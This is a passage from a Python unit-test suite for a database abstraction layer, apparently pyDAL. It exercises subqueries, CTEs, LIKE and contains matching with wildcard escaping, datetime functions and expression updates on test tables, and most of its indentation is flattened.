if not IS_ORACLE:
self.assertEqual(result.response[3][0], "")
db.tt.drop()
db.define_table("tt", Field("aa", "integer"), Field("bb"))
db.tt.insert(bb="")
db.tt.insert(aa=1)
result = db(db.tt).select(db.tt.aa.coalesce_zero())
self.assertEqual(result.response[0][0], 0)
self.assertEqual(result.response[1][0], 1)
def testTableAliasCollisions(self):
db = self.connect()
db.define_table("t1", Field("aa"))
db.define_table("t2", Field("bb"))
t1, t2 = db.t1, db.t2
t1.with_alias("t2")
t2.with_alias("t1")
# The aliases collide with the real table names, so the table objects must be
# used directly; passing tables by name would raise an exception
t1.insert(aa="test")
t2.insert(bb="foo")
db(t1.id > 0).update(aa="bar")
having = t1.aa != None
join = [t2.on(t1.aa == t2.bb)]
db(t1.aa == t2.bb).select(t1.aa, groupby=t1.aa, having=having, orderby=t1.aa)
db(t1.aa).select(t1.aa, join=join, groupby=t1.aa, having=having, orderby=t1.aa)
db(t1.aa).select(t1.aa, left=join, groupby=t1.aa, having=having, orderby=t1.aa)
db(t1.id > 0).delete()
class TestSubselect(DALtest):
def testMethods(self):
db = self.connect()
db.define_table("tt", Field("aa", "integer"), Field("bb"))
data = [dict(aa=1, bb="foo"), dict(aa=1, bb="bar"), dict(aa=2, bb="foo")]
for item in data:
db.tt.insert(**item)
fields = [db.tt.aa, db.tt.bb, db.tt.aa + 2, (db.tt.aa + 1).with_alias("exp")]
sub = db(db.tt).nested_select(*fields, orderby=db.tt.id)
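# nested_select() builds a subquery object that behaves much like a table:
# its output columns are exposed as fields and it can be aliased and joined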
# Check the fields provided by the object
self.assertEqual(sorted(["aa", "bb", "exp"]), sorted(list(sub.fields)))
for name in sub.fields:
self.assertIsInstance(sub[name], Field)
for item in sub:
self.assertIsInstance(item, Field)
self.assertEqual(len(list(sub)), len(sub.fields))
for key, val in zip(sub.fields, sub):
self.assertIs(sub[key], val)
self.assertIs(getattr(sub, key), val)
tmp = sub._filter_fields(dict(aa=1, exp=2, foo=3))
self.assertEqual(tmp, dict(aa=1, exp=2))
# Check result from executing the query
result = sub()
self.assertEqual(len(result), len(data))
for idx, row in enumerate(data):
self.assertEqual(result[idx]["tt"].as_dict(), row)
self.assertEqual(result[idx]["exp"], row["aa"] + 1)
result = db.executesql(str(sub))
for idx, row in enumerate(data):
tmp = [row["aa"], row["bb"], row["aa"] + 2, row["aa"] + 1]
self.assertEqual(list(result[idx]), tmp)
# Check that query expansion methods don't work without alias
self.assertEqual(sub._rname, None)
self.assertEqual(sub._raw_rname, None)
self.assertEqual(sub._dalname, None)
with self.assertRaises(SyntaxError):
sub.query_name()
with self.assertRaises(SyntaxError):
sub.sql_shortref
with self.assertRaises(SyntaxError):
sub.on(sub.aa != None)
# Alias checks
sub = sub.with_alias("foo")
result = sub()
for idx, row in enumerate(data):
self.assertEqual(result[idx]["tt"].as_dict(), row)
self.assertEqual(result[idx]["exp"], row["aa"] + 1)
# Check query expansion methods again
self.assertEqual(sub._rname, None)
self.assertEqual(sub._raw_rname, None)
self.assertEqual(sub._dalname, None)
self.assertEqual(sub.query_name()[0], str(sub))
self.assertEqual(sub.sql_shortref, db._adapter.dialect.quote("foo"))
self.assertIsInstance(sub.on(sub.aa != None), Expression)
def testCTE(self):
db = self.connect()
db.define_table("org", Field("name"), Field("boss", "reference org"))
org = db.org
def insert_workers(boss, *names):
    return [org.insert(name=name, boss=boss) for name in names]
alice = org.insert(name="Alice")
jim, tim = insert_workers(alice, "Jim", "Tim")
jessy, jenny = insert_workers(jim, "Jessy", "Jenny")
insert_workers(tim, "Tom")
insert_workers(jessy, "John", "Jacob")
works_for = db(org.name == "Alice").cte(
    "works_for",
    org.id,
    org.name.with_alias("top_boss"),  # i.e. Alice is the top boss
    org.name,
    org.boss,
    Expression(db, "0", type="integer").with_alias("xdepth"),
    Expression(db, '" "', type="string").with_alias("boss_chain"),
).union(
    lambda works_for: db(
        (org.boss == works_for.id) & (org.id != org.boss)
    ).nested_select(
        org.id,
        works_for.top_boss,
        org.name,
        org.boss,
        (works_for.xdepth + 1).with_alias("xdepth"),
        (" " + works_for.name + works_for.boss_chain).with_alias("boss_chain"),
    )
)
rows = db().select(works_for.ALL).as_dict()
# reconstruct boss_chain/depth and test them against query result
for row in rows.values():
r = row
boss_chain = []
while True:
r = rows.get(r['boss'])
if not r:
break
boss_chain.append(r['name'])
depth = len(boss_chain)
self.assertEqual(depth, row['xdepth'])
self.assertEqual(' '.join(boss_chain), row['boss_chain'].strip())
def testSelectArguments(self):
db = self.connect()
db.define_table("tt", Field("aa", "integer"), Field("bb"))
data = [
dict(aa=1, bb="foo"),
dict(aa=1, bb="bar"),
dict(aa=2, bb="foo"),
dict(aa=3, bb="foo"),
dict(aa=3, bb="baz"),
]
expected = [(1, None, 0), (2, 2, 2), (2, 2, 2), (3, 4, 3), (3, 8, 6)]
for item in data:
db.tt.insert(**item)
# Check that select clauses work as expected in stand-alone query
t1 = db.tt.with_alias("t1")
t2 = db.tt.with_alias("t2")
fields = [
t1.aa,
t2.aa.sum().with_alias("total"),
t2.aa.count().with_alias("cnt"),
]
join = t1.on(db.tt.bb != t1.bb)
left = t2.on(t1.aa > t2.aa)
group = db.tt.bb | t1.aa
having = db.tt.aa.count() > 1
order = t1.aa | t2.aa.count()
limit = (1, 6)
sub = db(db.tt.aa != 2).nested_select(
*fields,
join=join,
left=left,
orderby=order,
groupby=group,
having=having,
limitby=limit
)
result = sub()
self.assertEqual(len(result), len(expected))
for idx, val in enumerate(expected):
self.assertEqual(result[idx]["t1"]["aa"], val[0])
self.assertEqual(result[idx]["total"], val[1])
self.assertEqual(result[idx]["cnt"], val[2])
# Check again when nested inside another query
# Also check that the alias will not conflict with existing table
t3 = db.tt.with_alias("t3")
sub = sub.with_alias("tt")
query = (t3.bb == "foo") & (t3.aa == sub.aa)
order = t3.aa | sub.cnt
result = db(query).select(t3.aa, sub.total, sub.cnt, orderby=order)
for idx, val in enumerate(expected):
self.assertEqual(result[idx]["t3"]["aa"], val[0])
self.assertEqual(result[idx]["tt"]["total"], val[1])
self.assertEqual(result[idx]["tt"]["cnt"], val[2])
# Check "distinct" modifier separately
sub = db(db.tt.aa != 2).nested_select(db.tt.aa, orderby=db.tt.aa, distinct=True)
result = sub().as_list()
self.assertEqual(result, [dict(aa=1), dict(aa=3)])
def testCorrelated(self):
db = self.connect()
db.define_table(
"t1", Field("aa", "integer"), Field("bb"), Field("mark", "integer")
)
db.define_table("t2", Field("aa", "integer"), Field("cc"))
db.define_table("t3", Field("aa", "integer"))
data_t1 = [
dict(aa=1, bb="bar"),
dict(aa=1, bb="foo"),
dict(aa=2, bb="foo"),
dict(aa=2, bb="test"),
dict(aa=3, bb="baz"),
dict(aa=3, bb="foo"),
]
data_t2 = [dict(aa=1, cc="foo"), dict(aa=2, cc="bar"), dict(aa=3, cc="baz")]
expected_cor = [(1, "foo"), (3, "baz")]
expected_leftcor = [(1, "foo"), (2, None), (3, "baz")]
expected_uncor = [(1, "bar"), (1, "foo"), (2, "foo"), (3, "baz"), (3, "foo")]
for item in data_t1:
db.t1.insert(**item)
for item in data_t2:
db.t2.insert(**item)
db.t3.insert(aa=item["aa"])
# Correlated subqueries
subquery = db.t1.aa == db.t2.aa
subfields = [db.t2.cc]
sub = db(subquery).nested_select(*subfields).with_alias("sub")
query = db.t1.bb.belongs(sub)
order = db.t1.aa | db.t1.bb
result = db(query).select(db.t1.aa, db.t1.bb, orderby=order)
self.assertEqual(len(result), len(expected_cor))
for idx, val in enumerate(expected_cor):
self.assertEqual(result[idx]["aa"], val[0])
self.assertEqual(result[idx]["bb"], val[1])
join = [db.t1.on((db.t3.aa == db.t1.aa) & db.t1.bb.belongs(sub))]
order = db.t3.aa | db.t1.bb
result = db(db.t3).select(db.t3.aa, db.t1.bb, join=join, orderby=order)
self.assertEqual(len(result), len(expected_cor))
for idx, val in enumerate(expected_cor):
self.assertEqual(result[idx]["t3"]["aa"], val[0])
self.assertEqual(result[idx]["t1"]["bb"], val[1])
left = [db.t1.on((db.t3.aa == db.t1.aa) & db.t1.bb.belongs(sub))]
result = db(db.t3).select(db.t3.aa, db.t1.bb, left=left, orderby=order)
self.assertEqual(len(result), len(expected_leftcor))
for idx, val in enumerate(expected_leftcor):
self.assertEqual(result[idx]["t3"]["aa"], val[0])
self.assertEqual(result[idx]["t1"]["bb"], val[1])
order = db.t1.aa | db.t1.bb
db(db.t1.bb.belongs(sub)).update(mark=1)
result = db(db.t1.mark == 1).select(db.t1.aa, db.t1.bb, orderby=order)
self.assertEqual(len(result), len(expected_cor))
for idx, val in enumerate(expected_cor):
self.assertEqual(result[idx]["aa"], val[0])
self.assertEqual(result[idx]["bb"], val[1])
db(~db.t1.bb.belongs(sub)).delete()
result = db(db.t1.id > 0).select(db.t1.aa, db.t1.bb, orderby=order)
self.assertEqual(len(result), len(expected_cor))
for idx, val in enumerate(expected_cor):
self.assertEqual(result[idx]["aa"], val[0])
self.assertEqual(result[idx]["bb"], val[1])
db(db.t1.id > 0).delete()
for item in data_t1:
db.t1.insert(**item)
# Uncorrelated subqueries
kwargs = dict(correlated=False)
sub = db(subquery).nested_select(*subfields, **kwargs)
query = db.t1.bb.belongs(sub)
order = db.t1.aa | db.t1.bb
result = db(query).select(db.t1.aa, db.t1.bb, orderby=order)
self.assertEqual(len(result), len(expected_uncor))
for idx, val in enumerate(expected_uncor):
self.assertEqual(result[idx]["aa"], val[0])
self.assertEqual(result[idx]["bb"], val[1])
join = [db.t1.on((db.t3.aa == db.t1.aa) & db.t1.bb.belongs(sub))]
order = db.t3.aa | db.t1.bb
result = db(db.t3).select(db.t3.aa, db.t1.bb, join=join, orderby=order)
self.assertEqual(len(result), len(expected_uncor))
for idx, val in enumerate(expected_uncor):
self.assertEqual(result[idx]["t3"]["aa"], val[0])
self.assertEqual(result[idx]["t1"]["bb"], val[1])
left = [db.t1.on((db.t3.aa == db.t1.aa) & db.t1.bb.belongs(sub))]
result = db(db.t3).select(db.t3.aa, db.t1.bb, left=left, orderby=order)
self.assertEqual(len(result), len(expected_uncor))
for idx, val in enumerate(expected_uncor):
self.assertEqual(result[idx]["t3"]["aa"], val[0])
self.assertEqual(result[idx]["t1"]["bb"], val[1])
# MySQL does not support subqueries with uncorrelated references
# to target table
# Correlation prevented by alias in parent select
tmp = db.t1.with_alias("tmp")
sub = db(subquery).nested_select(*subfields)
query = tmp.bb.belongs(sub)
order = tmp.aa | tmp.bb
result = db(query).select(tmp.aa, tmp.bb, orderby=order)
self.assertEqual(len(result), len(expected_uncor))
for idx, val in enumerate(expected_uncor):
self.assertEqual(result[idx]["aa"], val[0])
self.assertEqual(result[idx]["bb"], val[1])
join = [tmp.on((db.t3.aa == tmp.aa) & tmp.bb.belongs(sub))]
order = db.t3.aa | tmp.bb
result = db(db.t3).select(db.t3.aa, tmp.bb, join=join, orderby=order)
self.assertEqual(len(result), len(expected_uncor))
for idx, val in enumerate(expected_uncor):
self.assertEqual(result[idx]["t3"]["aa"], val[0])
self.assertEqual(result[idx]["tmp"]["bb"], val[1])
left = [tmp.on((db.t3.aa == tmp.aa) & tmp.bb.belongs(sub))]
result = db(db.t3).select(db.t3.aa, tmp.bb, left=left, orderby=order)
self.assertEqual(len(result), len(expected_uncor))
for idx, val in enumerate(expected_uncor):
self.assertEqual(result[idx]["t3"]["aa"], val[0])
self.assertEqual(result[idx]["tmp"]["bb"], val[1])
# SQLite does not support aliasing target table in UPDATE/DELETE
# MySQL does not support subqueries with uncorrelated references
# to target table
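# A sketch of the statements omitted because of those limitations
# (assuming a backend that allows an aliased target):
#   db(tmp.bb.belongs(sub)).update(mark=1)
#   db(~tmp.bb.belongs(sub)).delete()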
class TestAddMethod(DALtest):
def testRun(self):
db = self.connect()
db.define_table("tt", Field("aa"))
@db.tt.add_method.all
def select_all(table, orderby=None):
return table._db(table).select(orderby=orderby)
self.assertEqual(db.tt.insert(aa="1"), 1)
if not IS_TERADATA:
self.assertEqual(db.tt.insert(aa="1"), 2)
self.assertEqual(db.tt.insert(aa="1"), 3)
else:
self.assertEqual(db.tt.insert(aa="1"), 1)
self.assertEqual(db.tt.insert(aa="1"), 1)
self.assertEqual(len(db.tt.all()), 3)
class TestBelongs(DALtest):
def testRun(self):
db = self.connect()
db.define_table("tt", Field("aa"))
self.assertEqual(db.tt.insert(aa="1"), 1)
if not IS_TERADATA:
self.assertEqual(db.tt.insert(aa="2"), 2)
self.assertEqual(db.tt.insert(aa="3"), 3)
else:
self.assertEqual(db.tt.insert(aa="2"), 1)
self.assertEqual(db.tt.insert(aa="3"), 1)
self.assertEqual(db(db.tt.aa.belongs(("1", "3"))).count(), 2)
self.assertEqual(
db(db.tt.aa.belongs(db(db.tt.id > 2)._select(db.tt.aa))).count(), 1
)
self.assertEqual(
db(
db.tt.aa.belongs(db(db.tt.aa.belongs(("1", "3")))._select(db.tt.aa))
).count(),
2,
)
self.assertEqual(
db(
db.tt.aa.belongs(
db(
db.tt.aa.belongs(
db(db.tt.aa.belongs(("1", "3")))._select(db.tt.aa)
)
)._select(db.tt.aa)
)
).count(),
2,
)
class TestContains(DALtest):
def testRun(self):
db = self.connect()
db.define_table("tt", Field("aa", "list:string"), Field("bb", "string"))
self.assertEqual(db.tt.insert(aa=["aaa", "bbb"], bb="aaa"), 1)
if not IS_TERADATA:
self.assertEqual(db.tt.insert(aa=["bbb", "ddd"], bb="abb"), 2)
self.assertEqual(db.tt.insert(aa=["eee", "aaa"], bb="acc"), 3)
else:
self.assertEqual(db.tt.insert(aa=["bbb", "ddd"], bb="abb"), 1)
self.assertEqual(db.tt.insert(aa=["eee", "aaa"], bb="acc"), 1)
self.assertEqual(db(db.tt.aa.contains("aaa")).count(), 2)
self.assertEqual(db(db.tt.aa.contains("bbb")).count(), 2)
self.assertEqual(db(db.tt.aa.contains("aa")).count(), 0)
self.assertEqual(db(db.tt.bb.contains("a")).count(), 3)
self.assertEqual(db(db.tt.bb.contains("b")).count(), 1)
self.assertEqual(db(db.tt.bb.contains("d")).count(), 0)
self.assertEqual(db(db.tt.aa.contains(db.tt.bb)).count(), 1)
# case-sensitivity probe: a count of 1 means the backend matches
# case-insensitively by default
is_case_insensitive = db(db.tt.bb.like("%AA%")).count()
if is_case_insensitive:
self.assertEqual(db(db.tt.aa.contains("AAA")).count(), 2)
self.assertEqual(db(db.tt.bb.contains("A")).count(), 3)
else:
self.assertEqual(
db(db.tt.aa.contains("AAA", case_sensitive=True)).count(), 0
)
self.assertEqual(db(db.tt.bb.contains("A", case_sensitive=True)).count(), 0)
self.assertEqual(
db(db.tt.aa.contains("AAA", case_sensitive=False)).count(), 2
)
self.assertEqual(
db(db.tt.bb.contains("A", case_sensitive=False)).count(), 3
)
db.tt.drop()
# integers in string fields
db.define_table(
"tt",
Field("aa", "list:string"),
Field("bb", "string"),
Field("cc", "integer"),
)
self.assertEqual(db.tt.insert(aa=["123", "456"], bb="123", cc=12), 1)
if not IS_TERADATA:
self.assertEqual(db.tt.insert(aa=["124", "456"], bb="123", cc=123), 2)
self.assertEqual(db.tt.insert(aa=["125", "457"], bb="23", cc=125), 3)
else:
self.assertEqual(db.tt.insert(aa=["124", "456"], bb="123", cc=123), 1)
self.assertEqual(db.tt.insert(aa=["125", "457"], bb="23", cc=125), 1)
self.assertEqual(db(db.tt.aa.contains(123)).count(), 1)
self.assertEqual(db(db.tt.aa.contains(23)).count(), 0)
self.assertEqual(db(db.tt.aa.contains(db.tt.cc)).count(), 1)
self.assertEqual(db(db.tt.bb.contains(123)).count(), 2)
self.assertEqual(db(db.tt.bb.contains(23)).count(), 3)
self.assertEqual(db(db.tt.bb.contains(db.tt.cc)).count(), 2)
db.tt.drop()
# string field contains string field
db.define_table("tt", Field("aa"), Field("bb"))
db.tt.insert(aa="aaa", bb="%aaa")
db.tt.insert(aa="aaa", bb="aaa")
self.assertEqual(db(db.tt.aa.contains(db.tt.bb)).count(), 1)
db.tt.drop()
# escaping
db.define_table("tt", Field("aa"))
db.tt.insert(aa="perc%ent")
db.tt.insert(aa="percent")
db.tt.insert(aa="percxyzent")
db.tt.insert(aa="under_score")
db.tt.insert(aa="underxscore")
db.tt.insert(aa="underyscore")
self.assertEqual(db(db.tt.aa.contains("perc%ent")).count(), 1)
self.assertEqual(db(db.tt.aa.contains("under_score")).count(), 1)
class TestLike(DALtest):
def setUp(self):
db = self.connect()
db.define_table("tt", Field("aa"))
self.assertEqual(isinstance(db.tt.insert(aa="abc"), long), True)
self.db = db
def testRun(self):
db = self.db
self.assertEqual(db(db.tt.aa.like("a%")).count(), 1)
self.assertEqual(db(db.tt.aa.like("%b%")).count(), 1)
self.assertEqual(db(db.tt.aa.like("%c")).count(), 1)
self.assertEqual(db(db.tt.aa.like("%d%")).count(), 0)
self.assertEqual(db(db.tt.aa.like("ab_")).count(), 1)
self.assertEqual(db(db.tt.aa.like("a_c")).count(), 1)
self.assertEqual(db(db.tt.aa.like("_bc")).count(), 1)
self.assertEqual(db(db.tt.aa.like("A%", case_sensitive=False)).count(), 1)
self.assertEqual(db(db.tt.aa.like("%B%", case_sensitive=False)).count(), 1)
self.assertEqual(db(db.tt.aa.like("%C", case_sensitive=False)).count(), 1)
self.assertEqual(db(db.tt.aa.ilike("A%")).count(), 1)
self.assertEqual(db(db.tt.aa.ilike("%B%")).count(), 1)
self.assertEqual(db(db.tt.aa.ilike("%C")).count(), 1)
# DAL maps like() (and contains(), startswith(), endswith())
# to the LIKE operator, which in ANSI SQL is case-sensitive.
# Some backends are case-sensitive by default while others need
# additional care to turn case-sensitivity on. To tell them apart,
# run a query comparing the previously inserted 'abc' with 'ABC':
# a result of 0 means the backend matches case-sensitively,
# a result of 1 means it is case-insensitive by default.
is_case_insensitive = db(db.tt.aa.like("%ABC%")).count()
self.assertEqual(db(db.tt.aa.like("A%")).count(), is_case_insensitive)
self.assertEqual(db(db.tt.aa.like("%B%")).count(), is_case_insensitive)
self.assertEqual(db(db.tt.aa.like("%C")).count(), is_case_insensitive)
def testUpperLower(self):
db = self.db
self.assertEqual(db(db.tt.aa.upper().like("A%")).count(), 1)
self.assertEqual(db(db.tt.aa.upper().like("%B%")).count(), 1)
self.assertEqual(db(db.tt.aa.upper().like("%C")).count(), 1)
self.assertEqual(db(db.tt.aa.lower().like("%c")).count(), 1)
def testStartsEndsWith(self):
db = self.db
self.assertEqual(db(db.tt.aa.startswith("a")).count(), 1)
self.assertEqual(db(db.tt.aa.endswith("c")).count(), 1)
self.assertEqual(db(db.tt.aa.startswith("c")).count(), 0)
self.assertEqual(db(db.tt.aa.endswith("a")).count(), 0)
def testEscaping(self):
db = self.db
term = "ahbc".replace("h", "\\") # funny but to avoid any doubts...
db.tt.insert(aa="a%bc")
db.tt.insert(aa="a_bc")
db.tt.insert(aa=term)
self.assertEqual(db(db.tt.aa.like("%ax%bc%", escape="x")).count(), 1)
self.assertEqual(db(db.tt.aa.like("%ax_bc%", escape="x")).count(), 1)
self.assertEqual(db(db.tt.aa.like("%" + term + "%")).count(), 1)
db(db.tt.id > 0).delete()
# test "literal" like, i.e. exactly as LIKE in the backend
db.tt.insert(aa="perc%ent")
db.tt.insert(aa="percent")
db.tt.insert(aa="percxyzent")
db.tt.insert(aa="under_score")
db.tt.insert(aa="underxscore")
db.tt.insert(aa="underyscore")
self.assertEqual(db(db.tt.aa.like("%perc%ent%")).count(), 3)
self.assertEqual(db(db.tt.aa.like("%under_score%")).count(), 3)
db(db.tt.id > 0).delete()
# escaping with startswith and endswith
db.tt.insert(aa="%percent")
db.tt.insert(aa="xpercent")
db.tt.insert(aa="discount%")
db.tt.insert(aa="discountx")
self.assertEqual(db(db.tt.aa.endswith("discount%")).count(), 1)
self.assertEqual(db(db.tt.aa.like("discount%%")).count(), 2)
self.assertEqual(db(db.tt.aa.startswith("%percent")).count(), 1)
self.assertEqual(db(db.tt.aa.like("%%percent")).count(), 2)
@unittest.skipIf(IS_MSSQL, "No Regexp on MSSQL")
def testRegexp(self):
db = self.db
db(db.tt.id > 0).delete()
db.tt.insert(aa="%percent")
db.tt.insert(aa="xpercent")
db.tt.insert(aa="discount%")
db.tt.insert(aa="discountx")
try:
self.assertEqual(db(db.tt.aa.regexp("count")).count(), 2)
except NotImplementedError:
pass
else:
self.assertEqual(db(db.tt.aa.lower().regexp("count")).count(), 2)
self.assertEqual(
db(
db.tt.aa.upper().regexp("COUNT") & db.tt.aa.lower().regexp("count")
).count(),
2,
)
self.assertEqual(
db(
db.tt.aa.upper().regexp("COUNT") | (db.tt.aa.lower() == "xpercent")
).count(),
3,
)
def testLikeInteger(self):
db = self.db
db.tt.drop()
db.define_table("tt", Field("aa", "integer"))
self.assertEqual(isinstance(db.tt.insert(aa=1111111111), long), True)
self.assertEqual(isinstance(db.tt.insert(aa=1234567), long), True)
self.assertEqual(db(db.tt.aa.like("1%")).count(), 2)
self.assertEqual(db(db.tt.aa.like("1_3%")).count(), 1)
self.assertEqual(db(db.tt.aa.like("2%")).count(), 0)
self.assertEqual(db(db.tt.aa.like("_2%")).count(), 1)
self.assertEqual(db(db.tt.aa.like("12%")).count(), 1)
self.assertEqual(db(db.tt.aa.like("012%")).count(), 0)
self.assertEqual(db(db.tt.aa.like("%45%")).count(), 1)
self.assertEqual(db(db.tt.aa.like("%54%")).count(), 0)
class TestDatetime(DALtest):
def testRun(self):
db = self.connect()
db.define_table("tt", Field("aa", "datetime"))
self.assertEqual(db.tt.insert(aa=datetime.datetime(1971, 12, 21, 11, 30)), 1)
self.assertEqual(db.tt.insert(aa=datetime.datetime(1971, 11, 21, 10, 30)), 2)
self.assertEqual(db.tt.insert(aa=datetime.datetime(1970, 12, 21, 9, 31)), 3)
self.assertEqual(
db(db.tt.aa == datetime.datetime(1971, 12, 21, 11, 30)).count(), 1
)
self.assertEqual(db(db.tt.aa.year() == 1971).count(), 2)
self.assertEqual(db(db.tt.aa.month() > 11).count(), 2)
self.assertEqual(db(db.tt.aa.day() >= 21).count(), 3)
self.assertEqual(db(db.tt.aa.hour() < 10).count(), 1)
self.assertEqual(db(db.tt.aa.minutes() <= 30).count(), 2)
self.assertEqual(db(db.tt.aa.seconds() != 31).count(), 3)
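# epoch() is seconds since 1970-01-01, so only the 1970 row is deleted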
self.assertEqual(db(db.tt.aa.epoch() < 365 * 24 * 3600).delete(), 1)
db.tt.drop()
# pure TIME types without dates are not possible in Oracle
if not IS_ORACLE:
db.define_table("tt", Field("aa", "time"))
t0 = datetime.time(10, 30, 55)
db.tt.insert(aa=t0)
self.assertEqual(db().select(db.tt.aa)[0].aa, t0)
db.tt.drop()
db.define_table("tt", Field("aa", "date"))
t0 = datetime.date.today()
db.tt.insert(aa=t0)
self.assertEqual(db().select(db.tt.aa)[0].aa, t0)
class TestExpressions(DALtest):
@unittest.skipIf(IS_POSTGRESQL, "PG8000 does not like these")
def testRun(self):
db = self.connect()
db.define_table(
"tt", Field("aa", "integer"), Field("bb", "integer"), Field("cc")
)
self.assertEqual(db.tt.insert(aa=1, bb=0), 1)
self.assertEqual(db.tt.insert(aa=2, bb=0), 2)
self.assertEqual(db.tt.insert(aa=3, bb=0), 3)
# test update
self.assertEqual(db(db.tt.aa == 3).update(aa=db.tt.aa + 1, bb=db.tt.bb + 2), 1)
self.assertEqual(db(db.tt.aa == 4).count(), 1)
self.assertEqual(db(db.tt.bb == 2).count(), 1)
self.assertEqual(db(db.tt.aa == -2).count(), 0)
self.assertEqual(db(db.tt.aa == 4).update(aa=db.tt.aa * 2, bb=5), 1)
self.assertEqual(db(db.tt.bb == 5).count(), 1)
self.assertEqual(db(db.tt.aa + 1 == 9).count(), 1)
self.assertEqual(db(db.tt.aa + 1 == 9).update(aa=db.tt.aa - 2, cc="cc"), 1)
self.assertEqual(db(db.tt.cc == "cc").count(), 1)
self.assertEqual(db(db.tt.aa == 6).count(), 1)
self.assertEqual(db(db.tt.aa == 6).update(bb=db.tt.aa * (db.tt.bb - 3)), 1)
self.assertEqual(db(db.tt.bb == 12).count(), 1)
self.assertEqual(db(db.tt.aa == 6).count(), 1)
self.assertEqual(
db(db.tt.aa == 6).update(aa=db.tt.aa % 4 + 1, cc=db.tt.cc + "1" + "1"), 1
)
self.assertEqual(db(db.tt.cc == "cc11").count(), 1)
self.assertEqual(db(db.tt.aa == 3).count(), 1)
# test comparison-expression-based count
self.assertEqual(db(db.tt.aa != db.tt.aa).count(), 0)
self.assertEqual(db(db.tt.aa == db.tt.aa).count(), 3)
# test select aggregations
sum = (db.tt.aa + 1).sum()
self.assertEqual(db(db.tt.aa + 1 >= 3).select(sum).first()[sum], 7)
self.assertEqual(db((1 == 0) & (db.tt.aa >= db.tt.aa)).count(), 0)
self.assertEqual(db(db.tt.aa * 2 == -2).select(sum).first()[sum], None)
count = db.tt.aa.count()
avg = db.tt.aa.avg()
min = db.tt.aa.min()
max = db.tt.aa.max()
result = db(db.tt).select(sum, count, avg, min, max).first()
self.assertEqual(result[sum], 9)
self.assertEqual(result[count], 3)
self.assertEqual(result[avg], 2)
self.assertEqual(result[min], 1)
self.assertEqual(result[max], 3)
# Test basic expressions evaluated at python level
self.assertEqual(db((1 == 1) & (db.tt.aa >= 2)).count(), 2)
self.assertEqual(db((1 == 1) | (db.tt.aa >= 2)).count(), 3)
self.assertEqual(db((1 == 0) & (db.tt.aa >= 2)).count(), 0)
self.assertEqual(db((1 == 0) | (db.tt.aa >= 2)).count(), 2)
# test abs()
self.assertEqual(db(db.tt.aa == 2).update(aa=db.tt.aa * -10), 1)
abs = db.tt.aa.abs().with_alias("abs")
result = db(db.tt.aa == -20).select(abs).first()
self.assertEqual(result[abs], 20)
self.assertEqual(result["abs"], 20)
abs = db.tt.aa.abs() / 10 + 5
exp = abs.min() * 2 + 1
result = db(db.tt.aa == -20).select(exp).first()
self.assertEqual(result[exp], 15)
# test case()
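# condition.case(true_value, false_value) builds a SQL CASE WHEN expression
# evaluating to the first argument where the condition holds, else the second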
condition = db.tt.aa > 2
case = condition.case(db.tt.aa + 2, db.tt.aa - 2)
my_case = case.with_alias("my_case")
result = db().select(my_case)
self.assertEqual(len(result), 3)
self.assertEqual(result[0][my_case], -1)
self.assertEqual(result[0]["my_case"], -1)
self.assertEqual(result[1]["my_case"], -22)
self.assertEqual(result[2]["my_case"], 5)
# test expression based delete
self.assertEqual(db(db.tt.aa + 1 >= 4).count(), 1)
self.assertEqual(db(db.tt.aa + 1 >= 4).delete(), 1)
self.assertEqual(db(db.tt.aa).count(), 2)
def testUpdate(self):
db = self.connect()
# some db's only support seconds
datetime_datetime_today = datetime.datetime.today()
datetime_datetime_today = datetime_datetime_today.replace(microsecond=0)
one_day = datetime.timedelta(1)
one_sec = datetime.timedelta(0, 1)
update_vals = (
("string", "x", "y"),
("text", "x", "y"),
("password", "x", "y"),
("integer", 1, 2),
("bigint", 1, 2),
("float", 1.0, 2.0),
("double", 1.0, 2.0),
("boolean", True, False),
("date", datetime.date.today(), datetime.date.today() + one_day),
(
"datetime",
datetime.datetime(1971, 12, 21, 10, 30, 55, 0),
datetime_datetime_today,
),
(
"time",
datetime_datetime_today.time(),
(datetime_datetime_today + one_sec).time(),
),
)
for uv in update_vals:
if IS_ORACLE and (uv[0] == "time" or uv[0] == "text"):
# Oracle can have problems with this test on CLOBs,
# and a date-less "time" type is not supported
continue
db.define_table("tt", Field("aa", "integer", default=0), Field("bb", uv[0]))
self.assertTrue(isinstance(db.tt.insert(bb=uv[1]), long))
self.assertEqual(db(db.tt.aa + 1 == 1).select(db.tt.bb)[0].bb, uv[1])
self.assertEqual(db(db.tt.aa + 1 == 1).update(bb=uv[2]), 1)
self.assertEqual(db(db.tt.aa / 3 == 0).select(db.tt.bb)[0].bb, uv[2])
db.tt.drop()
def testSubstring(self):
db = self.connect()
t0 = db.define_table("t0", Field("name"))
input_name = "web2py"
t0.insert(name=input_name)
exp_slice = t0.name.lower()[4:6]
exp_slice_no_max = t0.name.lower()[4:]
exp_slice_neg_max = t0.name.lower()[2:-2]
exp_slice_neg_start = t0.name.lower()[-2:]
exp_item = t0.name.lower()[3]
out = (
db(t0)
.select(
exp_slice,
exp_item,
exp_slice_no_max,
exp_slice_neg_max,
exp_slice_neg_start,
)
.first()
)
self.assertEqual(out[exp_slice], input_name[4:6])
self.assertEqual(out[exp_item], input_name[3])
self.assertEqual(out[exp_slice_no_max], input_name[4:])
self.assertEqual(out[exp_slice_neg_max], input_name[2:-2])
self.assertEqual(out[exp_slice_neg_start], input_name[-2:])
def testOps(self):
db = self.connect()
t0 = db.define_table("t0", Field("vv", "integer"))
self.assertEqual(db.t0.insert(vv=1), 1)
self.assertEqual(db.t0.insert(vv=2), 2)
self.assertEqual(db.t0.insert(vv=3), 3)
sum = db.t0.vv.sum()
count = db.t0.vv.count()
avg = db.t0.vv.avg()
op = sum / count
op1 = (sum / count).with_alias("tot")
self.assertEqual(db(t0).select(op).first()[op], 2)
self.assertEqual(db(t0).select(op1).first()[op1], 2)
print("DICT", db(t0).select(op1).as_dict())
self.assertEqual(db(t0).select(op1).first()["tot"], 2)
op2 = avg * count
self.assertEqual(db(t0).select(op2).first()[op2], 6)
# the following is not possible at least on sqlite
sum = db.t0.vv.sum().with_alias("s")
count = db.t0.vv.count().with_alias("c")
op = sum / count
# self.assertEqual(db(t0).select(op).first()[op], 2)
class TestTableAliasing(DALtest):
def testRun(self):
db = self.connect()
db.define_table("t1", Field("aa"))
db.define_table(
"t2",
Field("pk", type="id", unique=True, notnull=True),
Field("bb", type="integer"),
rname="tt",
)
tab1 = db.t1.with_alias("test1")
tab2 = db.t2.with_alias("test2")
self.assertIs(tab2.id, tab2.pk)
self.assertIs(tab2._id, tab2.pk)
self.assertEqual(tab1._dalname, "t1")
self.assertEqual(tab1._tablename, "test1")
